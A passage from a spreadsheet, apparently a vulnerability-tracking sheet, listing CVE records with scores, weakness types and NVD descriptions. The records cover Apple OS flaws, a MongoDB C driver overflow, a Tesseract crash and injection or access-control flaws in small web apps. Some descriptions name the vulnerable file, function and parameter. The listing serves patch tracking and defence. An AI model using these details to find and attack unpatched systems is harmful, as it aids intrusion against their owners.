      </c>
      <c r="F1126" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1126" s="5" t="inlineStr"/>
      <c r="H1126" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1126" s="5" t="inlineStr"/>
      <c r="J1126" s="5" t="inlineStr"/>
      <c r="K1126" s="5" t="inlineStr"/>
      <c r="L1126" s="5" t="inlineStr"/>
      <c r="M1126" s="5" t="inlineStr"/>
      <c r="N1126" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1126" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1126" s="5" t="inlineStr"/>
      <c r="Q1126" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1126" s="5" t="inlineStr">
        <is>
          <t>An authorization issue was addressed with improved state management. This issue is fixed in iOS 27 and iPadOS 27, macOS Golden Gate 27, tvOS 27, visionOS 27, watchOS 27. A sandboxed app may be able to access the System Keychain.</t>
        </is>
      </c>
      <c r="S1126" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84628</t>
        </is>
      </c>
    </row>
    <row r="1127">
      <c r="A1127" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1127" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1127" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86878</t>
        </is>
      </c>
      <c r="D1127" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1127" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1127" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1127" s="5" t="inlineStr"/>
      <c r="H1127" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1127" s="5" t="inlineStr"/>
      <c r="J1127" s="5" t="inlineStr"/>
      <c r="K1127" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os</t>
        </is>
      </c>
      <c r="L1127" s="5" t="inlineStr"/>
      <c r="M1127" s="5" t="inlineStr"/>
      <c r="N1127" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1127" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1127" s="5" t="inlineStr"/>
      <c r="Q1127" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R1127" s="5" t="inlineStr">
        <is>
          <t>A permissions issue was addressed with additional restrictions. This issue is fixed in iOS 27 and iPadOS 27. An app may be able to access sensitive user data.</t>
        </is>
      </c>
      <c r="S1127" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86878</t>
        </is>
      </c>
    </row>
    <row r="1128">
      <c r="A1128" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1128" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1128" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86883</t>
        </is>
      </c>
      <c r="D1128" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1128" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1128" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1128" s="5" t="inlineStr"/>
      <c r="H1128" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1128" s="5" t="inlineStr"/>
      <c r="J1128" s="5" t="inlineStr"/>
      <c r="K1128" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:visionos</t>
        </is>
      </c>
      <c r="L1128" s="5" t="inlineStr"/>
      <c r="M1128" s="5" t="inlineStr"/>
      <c r="N1128" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1128" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1128" s="5" t="inlineStr"/>
      <c r="Q1128" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R1128" s="5" t="inlineStr">
        <is>
          <t>A privacy issue was addressed with improved handling of files. This issue is fixed in iOS 27 and iPadOS 27, visionOS 27. An app may be able to access sensitive user data.</t>
        </is>
      </c>
      <c r="S1128" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86883</t>
        </is>
      </c>
    </row>
    <row r="1129">
      <c r="A1129" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1129" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1129" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86897</t>
        </is>
      </c>
      <c r="D1129" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1129" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1129" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1129" s="5" t="inlineStr"/>
      <c r="H1129" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1129" s="5" t="inlineStr"/>
      <c r="J1129" s="5" t="inlineStr"/>
      <c r="K1129" s="5" t="inlineStr"/>
      <c r="L1129" s="5" t="inlineStr"/>
      <c r="M1129" s="5" t="inlineStr"/>
      <c r="N1129" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1129" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1129" s="5" t="inlineStr"/>
      <c r="Q1129" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1129" s="5" t="inlineStr">
        <is>
          <t>This issue was addressed with additional entitlement checks. This issue is fixed in Safari 27, iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, macOS Golden Gate 27, visionOS 27. An app may be able to access sensitive user data.</t>
        </is>
      </c>
      <c r="S1129" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86897</t>
        </is>
      </c>
    </row>
    <row r="1130">
      <c r="A1130" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1130" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1130" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86903</t>
        </is>
      </c>
      <c r="D1130" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1130" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1130" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1130" s="5" t="inlineStr"/>
      <c r="H1130" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1130" s="5" t="inlineStr"/>
      <c r="J1130" s="5" t="inlineStr"/>
      <c r="K1130" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:tvos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L1130" s="5" t="inlineStr"/>
      <c r="M1130" s="5" t="inlineStr"/>
      <c r="N1130" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1130" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1130" s="5" t="inlineStr"/>
      <c r="Q1130" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R1130" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds read was addressed with improved input validation. This issue is fixed in iOS 27 and iPadOS 27, macOS Golden Gate 27, tvOS 27, visionOS 27, watchOS 27. An app may be able to disclose kernel memory.</t>
        </is>
      </c>
      <c r="S1130" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86903</t>
        </is>
      </c>
    </row>
    <row r="1131">
      <c r="A1131" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1131" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1131" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86905</t>
        </is>
      </c>
      <c r="D1131" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1131" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1131" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1131" s="5" t="inlineStr"/>
      <c r="H1131" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1131" s="5" t="inlineStr"/>
      <c r="J1131" s="5" t="inlineStr"/>
      <c r="K1131" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:visionos</t>
        </is>
      </c>
      <c r="L1131" s="5" t="inlineStr"/>
      <c r="M1131" s="5" t="inlineStr"/>
      <c r="N1131" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1131" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1131" s="5" t="inlineStr"/>
      <c r="Q1131" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R1131" s="5" t="inlineStr">
        <is>
          <t>This issue was addressed by removing the vulnerable code. This issue is fixed in iOS 27 and iPadOS 27, macOS Golden Gate 27, visionOS 27. An app may be able to delete credentials stored in Keychain.</t>
        </is>
      </c>
      <c r="S1131" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86905</t>
        </is>
      </c>
    </row>
    <row r="1132">
      <c r="A1132" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1132" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1132" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86910</t>
        </is>
      </c>
      <c r="D1132" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1132" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1132" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1132" s="5" t="inlineStr"/>
      <c r="H1132" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1132" s="5" t="inlineStr"/>
      <c r="J1132" s="5" t="inlineStr"/>
      <c r="K1132" s="5" t="inlineStr"/>
      <c r="L1132" s="5" t="inlineStr"/>
      <c r="M1132" s="5" t="inlineStr"/>
      <c r="N1132" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1132" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1132" s="5" t="inlineStr"/>
      <c r="Q1132" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R1132" s="5" t="inlineStr">
        <is>
          <t>A permissions issue was addressed with improved path validation. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. An application may be able to access restricted files.</t>
        </is>
      </c>
      <c r="S1132" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86910</t>
        </is>
      </c>
    </row>
    <row r="1133">
      <c r="A1133" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1133" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1133" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86911</t>
        </is>
      </c>
      <c r="D1133" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1133" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1133" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1133" s="5" t="inlineStr"/>
      <c r="H1133" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1133" s="5" t="inlineStr"/>
      <c r="J1133" s="5" t="inlineStr"/>
      <c r="K1133" s="5" t="inlineStr"/>
      <c r="L1133" s="5" t="inlineStr"/>
      <c r="M1133" s="5" t="inlineStr"/>
      <c r="N1133" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1133" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1133" s="5" t="inlineStr"/>
      <c r="Q1133" s="5" t="inlineStr">
        <is>
          <t>CWE-1021</t>
        </is>
      </c>
      <c r="R1133" s="5" t="inlineStr">
        <is>
          <t>This issue was addressed with improved state management. This issue is fixed in macOS Golden Gate 27. A malicious app may be able to bypass clickjacking protections for secure prompts.</t>
        </is>
      </c>
      <c r="S1133" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86911</t>
        </is>
      </c>
    </row>
    <row r="1134">
      <c r="A1134" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1134" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1134" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86924</t>
        </is>
      </c>
      <c r="D1134" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1134" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1134" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1134" s="5" t="inlineStr"/>
      <c r="H1134" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1134" s="5" t="inlineStr"/>
      <c r="J1134" s="5" t="inlineStr"/>
      <c r="K1134" s="5" t="inlineStr"/>
      <c r="L1134" s="5" t="inlineStr"/>
      <c r="M1134" s="5" t="inlineStr"/>
      <c r="N1134" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1134" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1134" s="5" t="inlineStr"/>
      <c r="Q1134" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R1134" s="5" t="inlineStr">
        <is>
          <t>A memory corruption issue was addressed with improved input validation. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Tahoe 26.7. Connecting a malicious accessory may cause unexpected system termination.</t>
        </is>
      </c>
      <c r="S1134" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86924</t>
        </is>
      </c>
    </row>
    <row r="1135">
      <c r="A1135" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1135" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1135" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88035</t>
        </is>
      </c>
      <c r="D1135" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1135" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1135" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1135" s="5" t="inlineStr"/>
      <c r="H1135" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1135" s="5" t="inlineStr"/>
      <c r="J1135" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K1135" s="5" t="inlineStr">
        <is>
          <t>mongodb:c_driver</t>
        </is>
      </c>
      <c r="L1135" s="5" t="inlineStr"/>
      <c r="M1135" s="5" t="inlineStr"/>
      <c r="N1135" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1135" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P1135" s="5" t="inlineStr"/>
      <c r="Q1135" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R1135" s="5" t="inlineStr">
        <is>
          <t>A size check in the client-side authentication path of the MongoDB C Driver can wrap around, so an unusually large user-name value is accepted and copied past the end of a small buffer. A party able to set the driver's connection settings may cause the application that embeds the driver to terminate unexpectedly. Reaching this code requires a build in which the optional external SASL authentication backend is present and a connection configured to use it.</t>
        </is>
      </c>
      <c r="S1135" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88035</t>
        </is>
      </c>
    </row>
    <row r="1136">
      <c r="A1136" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1136" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1136" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88054</t>
        </is>
      </c>
      <c r="D1136" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1136" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1136" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1136" s="5" t="inlineStr"/>
      <c r="H1136" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1136" s="5" t="inlineStr"/>
      <c r="J1136" s="5" t="inlineStr"/>
      <c r="K1136" s="5" t="inlineStr">
        <is>
          <t>tesseract-ocr:tesseract_ocr</t>
        </is>
      </c>
      <c r="L1136" s="5" t="inlineStr"/>
      <c r="M1136" s="5" t="inlineStr"/>
      <c r="N1136" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1136" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P1136" s="5" t="inlineStr"/>
      <c r="Q1136" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-824</t>
        </is>
      </c>
      <c r="R1136" s="5" t="inlineStr">
        <is>
          <t>Tesseract is an open source OCR engine. In version 5.5.3 and earlier, Plumbing::DeSerialize in src/lstm/plumbing.cpp rejects excessively large network stacks but accepts a zero-length stack for NT_SERIES, NT_PARALLEL, or NT_REVERSED layers in a crafted .traineddata model. During LSTMRecognizer initialization in src/lstm/lstmrecognizer.cpp, CacheXScaleFactor(XScaleFactor()) reaches Series::CacheXScaleFactor in src/lstm/series.cpp, which dereferences stack_[0] on the empty vector and invokes a virtual method through an invalid Network pointer. This causes a deterministic crash and denial of service at model load. No fixed release is available as of this review.</t>
        </is>
      </c>
      <c r="S1136" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88054</t>
        </is>
      </c>
    </row>
    <row r="1137">
      <c r="A1137" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1137" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1137" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90517</t>
        </is>
      </c>
      <c r="D1137" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1137" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1137" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1137" s="5" t="inlineStr"/>
      <c r="H1137" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1137" s="5" t="inlineStr"/>
      <c r="J1137" s="5" t="inlineStr"/>
      <c r="K1137" s="5" t="inlineStr"/>
      <c r="L1137" s="5" t="inlineStr"/>
      <c r="M1137" s="5" t="inlineStr"/>
      <c r="N1137" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1137" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="P1137" s="5" t="inlineStr"/>
      <c r="Q1137" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-639</t>
        </is>
      </c>
      <c r="R1137" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in PHPGurukul Bank Locker Management System 1.0. This affects an unknown function of the file /blms/view-assign-locker.php. The manipulation of the argument ltid leads to authorization bypass. The attack may be initiated remotely. The exploit is publicly available and might be used.</t>
        </is>
      </c>
      <c r="S1137" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90517</t>
        </is>
      </c>
    </row>
    <row r="1138">
      <c r="A1138" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1138" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1138" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90522</t>
        </is>
      </c>
      <c r="D1138" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1138" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1138" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1138" s="5" t="inlineStr"/>
      <c r="H1138" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I1138" s="5" t="inlineStr"/>
      <c r="J1138" s="5" t="inlineStr"/>
      <c r="K1138" s="5" t="inlineStr"/>
      <c r="L1138" s="5" t="inlineStr"/>
      <c r="M1138" s="5" t="inlineStr"/>
      <c r="N1138" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1138" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="P1138" s="5" t="inlineStr"/>
      <c r="Q1138" s="5" t="inlineStr">
        <is>
          <t>CWE-640</t>
        </is>
      </c>
      <c r="R1138" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in jaychouchannel Tourism-Management-System up to d984d172dceca907f8b447efbdb06dc233f7938d. Impacted is the function resetPass of the file UsersController.java of the component Password Recovery. This manipulation causes weak password recovery. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. Patch name: 9cb6215ac871f99a90cde763cf003e95ff282283. It is recommended to apply a patch to fix this issue.</t>
        </is>
      </c>
      <c r="S1138" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90522</t>
        </is>
      </c>
    </row>
    <row r="1139">
      <c r="A1139" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1139" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1139" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90565</t>
        </is>
      </c>
      <c r="D1139" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1139" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1139" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1139" s="5" t="inlineStr"/>
      <c r="H1139" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I1139" s="5" t="inlineStr"/>
      <c r="J1139" s="5" t="inlineStr"/>
      <c r="K1139" s="5" t="inlineStr"/>
      <c r="L1139" s="5" t="inlineStr"/>
      <c r="M1139" s="5" t="inlineStr"/>
      <c r="N1139" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1139" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="P1139" s="5" t="inlineStr"/>
      <c r="Q1139" s="5" t="inlineStr">
        <is>
          <t>CWE-266, CWE-284</t>
        </is>
      </c>
      <c r="R1139" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in Rizwan17 inventory-management-system up to bfe78a330d01bb26b9daec5dc9ecd5c77900e03f. Affected is an unknown function of the file dashboard.php. Performing a manipulation of the argument userid results in improper access controls. It is possible to initiate the attack remotely. The exploit has been released to the public and may be used for attacks. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="S1139" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90565</t>
        </is>
      </c>
    </row>
    <row r="1140">
      <c r="A1140" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1140" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1140" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90619</t>
        </is>
      </c>
      <c r="D1140" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1140" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1140" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1140" s="5" t="inlineStr"/>
      <c r="H1140" s="5" t="n">
        <v>0.014</v>
      </c>
      <c r="I1140" s="5" t="inlineStr"/>
      <c r="J1140" s="5" t="inlineStr"/>
      <c r="K1140" s="5" t="inlineStr"/>
      <c r="L1140" s="5" t="inlineStr"/>
      <c r="M1140" s="5" t="inlineStr"/>
      <c r="N1140" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1140" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1140" s="5" t="inlineStr"/>
      <c r="Q1140" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="R1140" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in 0x4m4 HexStrike AI up to d689933ff579d839c676c82b231f8e98326c5f04. Impacted is an unknown function of the file hexstrike_server.py of the component Execute Endpoint. The manipulation of the argument code/script leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="S1140" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90619</t>
        </is>
      </c>
    </row>
    <row r="1141">
      <c r="A1141" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1141" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1141" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90690</t>
        </is>
      </c>
      <c r="D1141" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1141" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1141" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1141" s="5" t="inlineStr"/>
      <c r="H1141" s="5" t="n">
        <v>0.013</v>
      </c>
      <c r="I1141" s="5" t="inlineStr"/>
      <c r="J1141" s="5" t="inlineStr"/>
      <c r="K1141" s="5" t="inlineStr"/>
      <c r="L1141" s="5" t="inlineStr"/>
      <c r="M1141" s="5" t="inlineStr"/>
      <c r="N1141" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1141" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1141" s="5" t="inlineStr"/>
      <c r="Q1141" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="R1141" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in 0x4m4 HexStrike AI up to d689933ff579d839c676c82b231f8e98326c5f04. The affected element is the function subprocess.Popen of the file hexstrike_server.py of the component API Tools Endpoint. Executing a manipulation of the argument additional_args/target/username/password/scan_type/payload can lead to os command injection. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. A fix appears to be in progress.</t>
        </is>
      </c>
      <c r="S1141" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90690</t>
        </is>
      </c>
    </row>
    <row r="1142">
      <c r="A1142" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1142" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1142" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90710</t>
        </is>
      </c>
      <c r="D1142" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1142" s="5" t="inlineStr">
        <is>
